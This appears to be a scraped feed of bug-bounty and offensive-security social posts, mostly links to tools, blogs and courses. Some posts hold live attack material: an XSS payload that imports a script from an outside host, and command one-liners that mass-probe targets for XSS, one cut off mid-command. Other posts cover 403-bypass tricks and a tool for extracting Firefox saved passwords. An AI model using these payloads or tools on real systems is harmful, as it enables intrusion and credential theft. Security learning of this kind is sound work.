This tool can extract all saved passwords from Firefox, including website, username, and password, using just the Firefox profile directory.

Some good tools for Bug Bounty Hunting $$$$ github.com/Ignitetechnolo…

Subowner - A Simple python based tool to check for subdomain takeovers in mass scanning. Supports, AWS, Fastly, Shopify, Azure etc. github.com/ifconfig-me/su…

This is very useful, worth the read for red teamers. medium.com/tenable-techbl…

XSS on 403 Page Few Blogs about 403 XSS 1. medium.com/@Hacker_Yogi/h… 2. infosecwriteups.com/403-forbidden-… 3. labs.cognisys.group/posts/An-Intre… 4. github.com/HelloZeroNet/Z… 5. terryalanunlimited.com/xss-403-forbid…

Finding Hidden Parameter & Potential XSS with Arjun + KXSS arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss #bugbountytips #bugbounty

Hit a 403? Don’t stop there. Try path fuzzing, header manipulation, or even using tools like Burp Suite to test alternate methods (like POST instead of GET). Bypassing 403s often reveals juicy, hidden endpoints! #bugbounty #bugbountytip #bugbountytips

🚨 XSS from javascript hidden params by N0t0d4y assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e

Security Post - Day 47 #CyberSecurity #bugbountytip #Tips #oneliner #tricks #streaker #Focus #mindset #securitybreach

github.com/dafthack/MFASw… A tool for checking if MFA is enabled on multiple Microsoft Services

🔥🔥🔥 anveshan all in one script for your recon process. It finds - Subdomains - URLs - JS-Files - Screenshots - Ports - Secrets [inside js files] Link : github.com/hackersthan/an… #bugbounty #recon #CyberSecurity 🔥🔥🔥

Launch Your Cybersecurity Career at $0 cost List made by: Bornunique911 accesscyber.co github.com/rezaduty/cyber… github.com/Aksheet10/Cybe… github.com/gracenolan/Not… hextree.io tryhackme.com/r/resources/bl… tryhackme.com/r/resources/bl…

View my verified achievement from @IBMImpact. credly.com/badges/20f622a… via Credly

The Best 🏆 Simple #XSS Payload <Img Src=//X55.is OnLoad=import(src)> Why? 🤔 1⃣ It loads a remote script 📜 2⃣ It pops in SOURCE and DOM 🛠️ 3⃣ It allows custom code in URL hash ❤️‍🔥 #hack2learn ✨

📚 Path - Linux log files 📚 /var/log/messages /var/log/syslog /var/log/kern.log /var/log/dmesg /var/log/auth.log /var/log/dpkg.log /var/log/yum.log /var/log/boot.log /var/log/secure /var/log/Xorg.0.log /var/log/apache2/access.log /var/log/httpd/access_log

I'm excited to share a recent business logic vulnerability I discovered in a public bug bounty program. Here is the writeup : sayedv2.medium.com/business-logic… #bugbounty #cybersecurity

One Liners and Bug bounty ? Here are 7 blogs about One Liners to learn more about them 1. sherwyn-moodley.medium.com/possible-a-bet… 2. medium.com/@qaafqasim/pow… 3. th3m4rk5man.medium.com/one-liners-you… 4. systemweakness.com/essential-one-… 5. systemweakness.com/a-new-way-to-c… 6. infosecwriteups.com/cors-one-liner… 7.

These Vulnerabilities WILL Make you $100K in 2025 (Bug Bounty Tutorial) youtube.com/watch?v=fUhBiI… Ben Sadeghipour